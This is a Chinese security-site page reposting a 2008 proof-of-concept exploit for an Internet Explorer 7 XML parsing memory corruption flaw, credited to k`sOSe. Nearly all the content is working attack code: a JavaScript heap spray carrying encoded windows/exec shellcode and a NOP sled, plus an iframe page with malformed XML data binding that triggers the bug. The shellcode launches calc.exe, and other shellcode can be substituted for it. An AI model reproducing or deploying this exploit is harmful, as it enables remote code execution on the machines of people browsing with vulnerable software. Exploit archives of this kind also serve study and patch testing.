首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day
来源:www.metasploit.com 作者:k`sOSe 发布时间:2008-12-11  

<html>
<script>

 // k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13

 // windows/exec - 141 bytes                                                                    
 // http://www.metasploit.com                                                                   
 // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe   
 var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
   var block = unescape("%u0a0a%u0a0a");
 var nops = unescape("%u9090%u9090%u9090");


 while (block.length < 81920) block += block;
 var memory = new Array();
 var i=0;
 for (;i<1000;i++) memory[i] += (block + nops + shellcode);

 document.write("<iframe src=\"iframe.html\">");

</script>


</html>

<!-- iframe.html

<XML ID=I>
 <X>
  <C>
   <![CDATA[
    <image
     SRC=http://&#2570;&#2570;.xxxxx.org   
    >
    ]]>
   
  </C>
 </X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
 <XML ID=I>
 </XML>
 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
 </SPAN>
</SPAN>
-->


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel <= 2.6.27.8 ATMSV
·EasyMail ActiveX (emmailstore.
·eZ Publish < 3.9.5/3.10.1/4.0.
·Vinagre < 2.24.2 show_error()
·MS Internet Explorer XML Parsi
·linux x86 shellcode obfuscator
·Internet Explorer 7.0 XML 0da
·Exploits Multiple XSRF in DD-W
·eZ Publish 3.9.0/3.9.5/3.10.1
·DD-WRT v24-sp1 (XSRF) Cross Si
·Internet Explorer 8.0 Beta 2 A
·Neostrada Livebox Router Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved